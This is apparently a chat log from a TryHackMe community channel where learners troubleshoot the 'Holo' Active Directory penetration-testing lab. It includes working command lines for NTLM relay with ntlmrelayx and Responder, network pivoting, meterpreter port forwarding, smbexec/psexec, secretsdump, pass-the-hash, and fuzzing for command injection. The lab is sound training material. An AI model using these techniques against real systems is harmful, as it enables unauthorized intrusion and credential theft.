nah, wasn't me. I genuinely am wondering if someone else is messing with things because I swear this isn't the first time something has just been changed or moved without any of us knowing
hmm still didn't work
if you open Wireshark on PC-FILESRV01, do you see inbound SMB requests?
you should see responses every minute or so
So, in the syntax ntlmrelayx.py -t ldap://<IP> -smb2support --escalate-user <user> I put in the IP of DC-SRV01(which has the SMB port open) and the user ||watamet|| but it keeps erroring out. Any reasons why? (I am doing this on my attack box while I have Responder running)
the command you have there was a demo
Almost there. Hopefully the stupid questions will stop soon.
hmm I just restarted the network and after getting shell on FILESRV, i opened wireshark on FILESRV and still saw no SMB connections
Can I check which IP is performing the SMB connections ?
When it says restart the network what does it exactly signify? Restart the whole network or just the DC
Just go shutdown /r?
When the network resets, it physically resets all the machines back to the AMI we provided THM
when it says restart, it means restart PC-FILESRV01
there should definitely be inbound SMB requests coming from S-SRV02, I think the best advice I can give is reset the network
it takes a minute i think
$ proxychains smbexec.py -no-pass HOLOLIVE/SRV-ADMIN@10.200.114.30
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 10.200.114.30:445 <--denied
[-] [Errno Connection error (10.200.114.30:445)] [Errno 111] Connection refused
The last hurdle
Also [-] SOCKS: Don't have a relay for 10.200.114.30(445)
you can access 10.200.114.30, right?
without having to proxy any traffic through anything?
I personally recommend using sshuttle over chisel for this bit
I have sshuttle running
and in ntlmrelayx, if you run socks do you see a session?
This is what I'm getting
But I get this in responder as well:
[*] [LLMNR] Poisoned answer sent to 10.50.111.6 for name tun0
[*] [LLMNR] Poisoned answer sent to 10.50.111.6 for name tun0
[*] [LLMNR] Poisoned answer sent to 10.50.111.6 for name tun0
I did that :))
and you still have responder running, which is an issue and not at all required
in the NTLMrlRelayX console, do you see any inbound sessions?
Not really, just this message
it should look like so
If you don't see that, then I'd recommend restarting PC-FILESRV01, starting NTLMRelayX, and after that is set up, pop a Meterpreter shell and port forward.
If that doesn't work, my suggestion is restart the network
Yeah, I had a server hosted
I set up portforwarding using meterpreter with portfwd add -R -L tun0 -l 445 -p 445
it must be 0.0.0.0
good thing you mentioned it, haha :p
side note
the local admin hashes are the same
so if you dump hashes, you'll have persistence
Wait, so after getting rdp on PC-FILESRV01 using ||watanot's creds||, and getting Admin, I dump the hashes
yep, then you can regain access to FILESRV01 with ps/smbexec
Also, when you say local admin hashes are same, you mean the local admin and watanot's hashes?
ye
So correct me if I am wrong, I can then technically directly gain access to Admin using watanot's NTLM hash?
I'm sorry, my windows is weak
im stuck on the same thing when i try to psexec i get " Errno Connection error (10.200.133.30:445)] [Errno 111] Connection refused "
with the Administrator hash, not watamet
if you try smbclient -L //10.200.133.30/, do you get a connection refused, also?
Also, if we have sshuttle running, do we need meterpreter portfwd?
yes
yep i do
the reason for the port forward:
You're listening to traffic coming in on PC-FILESRV01 port 445 and redirecting it to your local port 445
that's a problem. How are you pivoting into 10.200.133.0/24?
chisel
so you'd need 2 proxychains
1 config file for pivoting into the LAN
2 config file for NTLM Relay
which is why I recommend sshuttle
New Error
[-] Authenticated as Guest. Aborting
[*] Opening SVCManager on 10.200.114.30.....
[-] Error performing the uninstallation, cleaning up
:))
Nvm, smbexec.py did the job
Finally!
congratulations dude ! im still fighting
You'll get there king.
It's report time
Just two report-related questions: Is it bad practice to copy the Offsec report verbatim, and are diagrams required?
Diagrams not required
i'll say use your best judgement on the offsec report
do what you'd do irl.
Nice one!
I'd need some advice on task 28. The text says "Now that we have successful authentication to the web app we know that we have an upload page" but I can't get to a working web app on S-SRV01 except a login page. Is it me or is there something wrong with the instance?
were you able to reset the password?
No, but thanks for the hint
Gave +1 Rep to @wind bobcat
The login page is the web app
you need to bypass the login page
Wait what the heck
why is that flipped around
@wind bobcat someone is definitely messing with things because those tasks are flipped for some odd reason
also I just went to fix the scheduled task bit. Did you already delete that question?
Any hints on how to find vulnerable application?
Just do some manual enumeration, it's pretty obvious once you find it
u get a reset every hour ig?
Hey, when enumerating the network initially, I see this 10.200.x.250 host up. What exactly is this?
thm infra
see following 3 messages, got the same question before
Everything is working fine proxies ntlmrelayx etc... but secretsdump gives me The attempted logon is invalid
i tried cracking the Administrator's hash but i get exhausted, i used the net user stuff
but i always get invalid logon
this thing gonna drive me crazy
Have you added the new user -and in the Admin group- with psexec/smbexec? Have you checked if the user is added or add another admin user?
i cant add them with psexec i get STATUS_LOGON_FAILURE
Try smbexec as an alternative, without an admin user secretsdump won't work. You don't need to crack the admin hash, for evil-winrm etc. you can use the hash..
With the domain admin hash you can, that's why we run secretsdump...
technically and theoretically yes but for some reason it will not let me, i will reset the network, something's going wrong
i dunno
thanks for your time
hello on google colab task for password cracking does it cost anything to use it?
no
@wind bobcat @lone spruce can I DM anyone regarding the report?
Just some stupid formatting questions
is it safe to auth to this app?
Go for it
Yeah 28 and 29 were flipped. It's fixed now and it makes way more sense
It's an official google product, yes
Regarding the PEN-300 prize, is it possible for the winner to swap it for something equivalent? Like AWAE ?
I would imagine you can't
I see, thanks for clarifying!
Can Anyone Help Me? IDK whats wrong
Do we need to install both dotnet-sdk and runtime or just SDK??
Try apt install libicu63, it should provide the ICU support
Or there should be a configuration file to set the said System.Globalization.Invariant to true
The error is perhaps caused due to system locale conversion or translations methods not available.
Thanks Cry :D
Gave +1 Rep to @lone spruce
we can certainly talk about substitution. Afaik, no voucher has been purchased yet
but we'll cross that bridge when it comes to it
I understand, thanks !
Except for the john and hashcat part, could the holo network be done with a raspberry?
I don't see why not
Only need patience, to install packages and covenant.
Thanks to the creators of "Holo", an excellent lab that I really enjoyed, especially the attack vectors of "DLL Hijacking" and "remote NTLM relay", just thank you!
u can do it without covenant
ikr, holo is awesome
That might be a little wacky with ARM but should be possible
I'm struggling at task 12 Q3
any HELP!
I'm not good at web
What am I supposed to do?
@potent perch that file should have already been found in task 10
have you checked robots.txt?
HELP - TASK 13
I tried this command and nothing interesting returned
wfuzz -u http://admin.holo.live/?FUZZ=ls+-la -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hw 2 -c
I HATE WFUZZ
Did you make sure that the cookie is stored
^
it requires authentication
you are right, thanks
Gave +1 Rep to @lone spruce